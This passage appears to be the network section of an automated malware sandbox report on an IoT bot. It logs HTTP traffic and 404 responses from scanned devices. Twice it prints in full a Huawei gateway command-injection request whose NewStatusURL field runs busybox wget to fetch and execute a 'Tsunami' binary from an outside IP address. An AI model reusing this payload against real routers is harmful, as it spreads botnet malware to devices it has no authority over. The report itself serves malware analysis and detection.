    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56894
    Source: unknownNetwork traffic detected: HTTP traffic on port 40044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36406 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43140
    Source: unknownNetwork traffic detected: HTTP traffic on port 59026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53388
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34664
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45558
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47736
    Source: unknownNetwork traffic detected: HTTP traffic on port 46074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43130
    Source: unknownNetwork traffic detected: HTTP traffic on port 37962 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58120 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42192 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56666
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37930
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54248
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54250
    Source: unknownNetwork traffic detected: HTTP traffic on port 53122 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60398 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39576 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47728
    Source: unknownNetwork traffic detected: HTTP traffic on port 59714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41188
    Source: unknownNetwork traffic detected: HTTP traffic on port 40604 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45558 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43082
    Source: unknownNetwork traffic detected: HTTP traffic on port 60552 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46608 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37640
    Source: unknownNetwork traffic detected: HTTP traffic on port 59448 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37886
    Source: unknownNetwork traffic detected: HTTP traffic on port 56778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57010
    Source: unknownNetwork traffic detected: HTTP traffic on port 60758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57490
    Source: unknownNetwork traffic detected: HTTP traffic on port 33896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33162 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47432
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45250
    Source: unknownNetwork traffic detected: HTTP traffic on port 34900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44160
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39810
    Source: unknownNetwork traffic detected: HTTP traffic on port 36004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57264
    Source: unknownNetwork traffic detected: HTTP traffic on port 38770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42670 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38266 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46336
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44156
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50878
    Source: unknownNetwork traffic detected: HTTP traffic on port 51492 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34348
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59448
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38952
    Source: unknownNetwork traffic detected: HTTP traffic on port 38368 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59254 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58120
    Source: unknownNetwork traffic detected: HTTP traffic on port 44736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39178 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48506
    Source: unknownNetwork traffic detected: HTTP traffic on port 48710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58546 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47412
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44380
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45230
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50884
    Source: unknownNetwork traffic detected: HTTP traffic on port 59780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58134
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60442
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33252
    Source: unknownNetwork traffic detected: HTTP traffic on port 60128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58614 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48228 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48978
    Source: unknown
        TCP traffic detected without corresponding DNS query
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 03:15:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1055Date: Mon, 01 Nov 2021 03:32:06 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 
68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 734Date: Mon, 01 Nov 2021 03:16:08 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 
65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 31 30 30 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=iso-8859-1Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 
69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=iso-8859-1Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 